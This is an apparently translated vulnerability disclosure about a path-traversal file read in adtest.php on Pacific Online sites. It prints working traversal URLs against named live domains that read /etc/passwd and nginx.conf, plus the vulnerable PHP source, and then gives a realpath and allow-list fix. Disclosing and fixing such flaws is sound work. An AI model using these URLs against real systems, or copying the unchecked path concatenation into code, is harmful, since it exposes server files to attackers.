Arbitrary file download on the main sites of the Pacific Online (太平洋网络) website group
pconline, pclady, pcauto, pcgames\... are all affected. Everyone knows Pacific Online runs on JSP, yet this vulnerability lives in PHP.
It appears to be related to ad monitoring.
Address:
http://www.pconline.com.cn/adtest.php?url=/../../../../etc/passwd
Let's take a look at what adtest.php actually does. Requesting its own source through the same parameter returns it:
http://www.pconline.com.cn/adtest.php?url=adtest.php
<?
// Vulnerable original: $uri is taken straight from the query string and
// concatenated onto DOCUMENT_ROOT, so "../" sequences walk out of the web root.
$uri = $_GET['url'];
$from = $_GET['from'];
$to = $_GET['to'];
$file = $HTTP_SERVER_VARS["DOCUMENT_ROOT"] . $uri;
$js = $_GET['js'];
if (file_exists($file)) {
    // Whatever path survived file_exists() is read in full and echoed back.
    $fd = fopen ($file, "r");
    $contents = fread ($fd, filesize ($file));
    fclose ($fd);
    if(isset($to)){
        // Ad-swap mode: rewrite src= attributes / showIvyViaJs calls from $from to $to.
        $contents = ereg_replace("#?(src=[^>]+|showIvyViaJs0?\\(['\"])$from([^-.\\w])", "\\1$to\\2", $contents);
    }else{
        if(isset($js)){
            // Script-swap mode: replace the <script> block matching $from with $js.
            $contents = ereg_replace("<script[^>]*id=[^>]*".$from."[^>]*>.*</script>|<script[^>]*>[^<]*".$from."[^<]*</script>", "<script src=".$js."></script>", $contents);
        }
    }
    print $contents;
}else{
    print "errors! Page note found!";
}
?>
http://www.pconline.com.cn/adtest.php?url=/../../../../etc/passwd
http://www.pcgames.com.cn/adtest.php?url=/../../../etc/passwd
http://www.pconline.com.cn/adtest.php?url=/../../../../usr/local/nginx/conf/nginx.conf
....
Fix recommendation:
Give adtest.php a whitelist or something similar; at the very least it must not be allowed to traverse outside its directory.
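Below is an added example of what that fix could look like; it is not the site's patched code. It resolves the requested path with realpath(), refuses anything that does not stay strictly inside a fixed base directory, and then checks the resolved file name against an explicit allow-list. The base directory, the allowed file names and the function name are assumptions for illustration.

```php
<?php
// Added example (not the original adtest.php): confine the "url" parameter to a
// fixed directory and an allow-list before reading anything from disk.

declare(strict_types=1);

// Hypothetical configuration: the only subtree and files the ad-test tool may serve.
const ADTEST_BASE = '/var/www/html/adtest';            // assumed directory
const ADTEST_ALLOWED = ['index.html', 'ad_slot.html'];  // assumed allow-list

/**
 * Return the absolute path of $uri if it is an allow-listed file inside $base,
 * or null if it escapes the directory, does not exist, or is not allow-listed.
 */
function resolve_adtest_file(string $uri, string $base = ADTEST_BASE, array $allowed = ADTEST_ALLOWED): ?string
{
    // Drop a leading slash so "/../../etc/passwd" cannot anchor at the filesystem root.
    $relative = ltrim($uri, '/');

    // realpath() collapses "..", symlinks and repeated separators, and returns false
    // for non-existent files, which replaces the original file_exists() branch.
    $baseReal = realpath($base);
    $fileReal = realpath($base . DIRECTORY_SEPARATOR . $relative);
    if ($baseReal === false || $fileReal === false) {
        return null;
    }

    // Containment check on the *resolved* path: it must sit strictly below the base.
    $prefix = $baseReal . DIRECTORY_SEPARATOR;
    if (strncmp($fileReal, $prefix, strlen($prefix)) !== 0) {
        return null;
    }

    // Allow-list check on the resolved relative name, so alias tricks cannot bypass it.
    $name = substr($fileReal, strlen($prefix));
    if (!in_array($name, $allowed, true)) {
        return null;
    }

    return $fileReal;
}

$file = resolve_adtest_file((string) ($_GET['url'] ?? ''));
if ($file === null) {
    http_response_code(404);
    echo 'errors! Page not found!';
    exit;
}

// The ad/script rewriting from the original tool would follow here; the one change
// this bug needs is that $file can no longer point outside ADTEST_BASE.
header('Content-Type: text/html; charset=utf-8');
readfile($file);
```

Two notes on the design: the containment test is done on the realpath() result rather than on the raw string, because checking for "../" in the input misses encoded, doubled or symlink-based variants; and the allow-list is applied after resolution for the same reason. The original script also relies on $HTTP_SERVER_VARS and ereg_replace(), both removed from PHP 5.4 and 7 respectively, so any rewrite of this file would need to replace those with $_SERVER and preg_replace() anyway.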